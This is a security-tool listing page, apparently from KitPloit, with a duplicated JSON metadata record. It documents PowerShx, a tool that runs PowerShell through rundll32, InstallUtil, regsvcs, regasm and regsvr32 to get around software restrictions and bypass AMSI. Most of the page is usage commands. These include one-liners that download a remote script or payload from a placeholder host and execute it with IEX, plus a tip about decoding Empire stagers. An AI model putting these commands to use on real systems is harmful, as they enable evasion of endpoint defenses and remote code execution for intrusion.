[](<https://blogger.googleusercontent.com/img/a/AVvXsEhX9hbGzB6P5Rl6fexaOhIlftUY5D182XjMC0aBE3dQr1B-6HznMejOY0n9ZOntasN2RV2GlPVFdxliuBt0cfoivz_jRhJuhFL4KDBJhlj8lp1DigCD-UaA0KkP8DM4ANjcu6zWhhM8u_COFwD6-Ej1jjUatXQ_xKiLeb0JwoSIfjitONhM1Fl3qYNZEg=s797>)
Unmanaged [PowerShell](<https://www.kitploit.com/search/label/PowerShell> "PowerShell" ) execution using DLLs or a standalone executable.
**Introduction**
PowerShx is a rewrite and expansion on the [PowerShdll](<https://github.com/p3nt4/PowerShdll> "PowerShdll" ) project. PowerShx provide functionalities for [bypassing](<https://www.kitploit.com/search/label/Bypassing> "bypassing" ) AMSI and running PS Cmdlets.
**Features**
* Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
* Run Powershell without powershell.exe or powershell_ise.exe
* AMSI Bypass features.
* Run Powershell scripts directly from the [command line](<https://www.kitploit.com/search/label/Command%20Line> "command line" ) or Powershell files
* Import Powershell modules and execute Powershell Cmdlets.
**Usage**
**.dll version**
**rundll32**
rundll32 PowerShx.dll,main -e <PS script to run>
rundll32 PowerShx.dll,main -f <path> Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console
**Alternatives (Credit to SubTee for these techniques):**
1.
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer
**.exe version**
PowerShx.exe -i Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path> Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.
**Embedded payloads**
Payloads can be embedded by updating the data [dictionary](<https://www.kitploit.com/search/label/Dictionary> "dictionary" ) "Common.Payloads.PayloadDict" in the "Common" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:
private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict["amsi"]);
}
**Examples**
**Run a base64 encoded script**
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex
Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode
**Run a base64 encoded script**
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"
**Requirements**
.NET 4
**Known Issues**
Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.
In dll mode, interractive mode and command output rely on [hijacking](<https://www.kitploit.com/search/label/Hijacking> "hijacking" ) the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.
Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.
**[Download PowerShx](<https://github.com/iomoath/PowerShx> "Download PowerShx" )**
{"id": "KITPLOIT:7455491847654148823", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "PowerShx - Run Powershell Without Software Restrictions", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEhX9hbGzB6P5Rl6fexaOhIlftUY5D182XjMC0aBE3dQr1B-6HznMejOY0n9ZOntasN2RV2GlPVFdxliuBt0cfoivz_jRhJuhFL4KDBJhlj8lp1DigCD-UaA0KkP8DM4ANjcu6zWhhM8u_COFwD6-Ej1jjUatXQ_xKiLeb0JwoSIfjitONhM1Fl3qYNZEg=s797>)\n\n \n\n\nUnmanaged [PowerShell](<https://www.kitploit.com/search/label/PowerShell> \"PowerShell\" ) execution using DLLs or a standalone executable.\n\n \n**Introduction** \n\n\nPowerShx is a rewrite and expansion on the [PowerShdll](<https://github.com/p3nt4/PowerShdll> \"PowerShdll\" ) project. PowerShx provide functionalities for [bypassing](<https://www.kitploit.com/search/label/Bypassing> \"bypassing\" ) AMSI and running PS Cmdlets.\n\n \n\n\n**Features** \n\n\n * Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.\n * Run Powershell without powershell.exe or powershell_ise.exe\n * AMSI Bypass features.\n * Run Powershell scripts directly from the [command line](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) or Powershell files\n * Import Powershell modules and execute Powershell Cmdlets.\n \n**Usage** \n \n**.dll version** \n \n**rundll32** \n\n \n \n rundll32 PowerShx.dll,main -e <PS script to run> \n rundll32 PowerShx.dll,main -f <path> Run the script passed as argument \n rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet \n rundll32 PowerShx.dll,main -w Start an interactive console in a new window \n rundll32 PowerShx.dll,main -i Start an interactive console \n rundll32 PowerShx.dll,main -s Attempt to bypass AMSI \n rundll32 PowerShx.dll,main -v Print Execution Output to the console \n \n\n \n**Alternatives (Credit to SubTee for these techniques):** \n\n \n \n 1. \n x86 - C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll \n x64 - C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031964\\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll \n 2. \n x86 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe PowerShx.dll \n x64 C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe PowerShx.dll \n 3. \n x86 C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U PowerShx.dll \n x64 C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U PowerShx.dll \n 4. \n regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer \n regsvr32 /s PowerShx.dll --> Calls DllRegisterServer \n \n\n \n**.exe version** \n\n \n \n PowerShx.exe -i Start an interactive console \n PowerShx.exe -e <PS script to run> \n PowerShx.exe -f <path> Run the script passed as argument \n PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet \n PowerShx.exe -s Attempt to bypass AMSI. \n \n\n \n**Embedded payloads** \n\n\nPayloads can be embedded by updating the data [dictionary](<https://www.kitploit.com/search/label/Dictionary> \"dictionary\" ) \"Common.Payloads.PayloadDict\" in the \"Common\" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:\n \n \n private void Handle(Options options) \n { \n // Pre-execution before user script \n _ps.Exe(Payloads.PayloadDict[\"amsi\"]); \n } \n \n\n \n**Examples** \n \n**Run a base64 encoded script** \n\n \n \n rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"BASE64\")) ^| iex \n \n PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(\"BASE64\")) ^| iex \n \n\nNote: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode\n\n \n**Run a base64 encoded script** \n\n \n \n rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex; \n \n PowerShx.exe -e \"IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))\" \n \n\n \n**Requirements** \n\n\n.NET 4\n\n \n**Known Issues** \n\n\nSome errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.\n\nIn dll mode, interractive mode and command output rely on [hijacking](<https://www.kitploit.com/search/label/Hijacking> \"hijacking\" ) the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.\n\nDue to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.\n\n \n \n\n\n**[Download PowerShx](<https://github.com/iomoath/PowerShx> \"Download PowerShx\" )**\n", "published": "2021-10-22T20:30:00", "modified": "2021-10-22T20:30:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2021/10/powershx-run-powershell-without_0539831274.html", "reporter": "KitPloit", "references": ["https://github.com/iomoath/PowerShx", "https://github.com/p3nt4/PowerShdll"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:01:34", "viewCount": 36, "enchantments": {"dependencies": {}, "score": {"value": 0.9, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.9}, "_state": {"dependencies": 1659914120, "score": 1659848886}, "_internal": {"score_hash": "5a37ac9220ff471f9ffa545b8ede46ec"}, "toolHref": "https://github.com/iomoath/PowerShx"}